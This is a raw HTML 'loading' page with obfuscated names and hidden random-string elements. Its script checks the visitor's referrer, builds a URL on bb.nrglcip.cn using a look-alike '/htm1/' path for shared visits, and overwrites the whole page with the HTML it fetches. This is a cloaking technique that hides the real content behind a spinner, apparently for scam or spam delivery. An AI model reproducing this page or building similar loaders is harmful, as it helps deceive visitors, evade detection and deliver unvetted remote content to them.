<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .h5wzGF {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .h5wzGF .Da3cZbZuH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .h5wzGF .content {
            line-height: 50px;
            text-align: center
        }

        .h5wzGF .img {
            width: 100%
        }

        .h5wzGF .uwJSs4J {
            text-align: center
        }

        .h5wzGF .uwJSs4J span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .h5wzGF .uwJSs4J span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .h5wzGF .uwJSs4J span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .h5wzGF .uwJSs4J span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .h5wzGF .uwJSs4J span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .h5wzGF .uwJSs4J span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .h5wzGF .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function I3BI7VGUuNz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pxsDZQ = I3BI7VGUuNz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pxsDZQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pxsDZQ +".html?a=share";
		}
		
        ie2SjRhk=url+"#"+new Date().getTime();
        ie2SjRhk && function() {
            $.get(ie2SjRhk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>JUJCgrFb6AetRIMgmEOxUWuC</div>
<div style='display:none'>JUJCgrFb6AetRIMgmEOxUWuC</div>
<a  href='#' style='display:none'>A7gDZna2w38MbTUYA6mupORYC6atzGa2Q4tLaTVWsCbqn0aoE</a>
<h1 style='display:none' >UfLuN3ZdTtmJteO1w7cU3nwd46hU6c7co3jDgVmACQgaMSL09BmkedRYbGpZFt0yEaiGpeaboY9gD3Sy5sDUT4R9WjrZK</h1><div class="h5wzGF">
    <div class="Da3cZbZuH">
        <div class="uwJSs4J">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >Irv30J9ih57vK9nVRp3BjZTpEANfJOVdgkCXfFuSR4yTnxonbgRomHKpKPyKh5nCezxtzcQs</h1>
<span style='display:none'>eqOTnB0lplZh</span>
<img  src='' style='display:none'>
<p  style='display:none'>wkA1ywq1hQLmFYmVfuoLX5EeZR3X39zGeSwuZz3D8bKmS7u5gz96bEKEhEJP5MorK2lcfQ0Q8u4WbETGsWE</p>
<li style='display:none' >PrPkhxYt1f4Y5qA0MJR1IQKSgH22gVm2</li>
<span style='display:none'>eqOTnB0lplZh</span></body>
</html>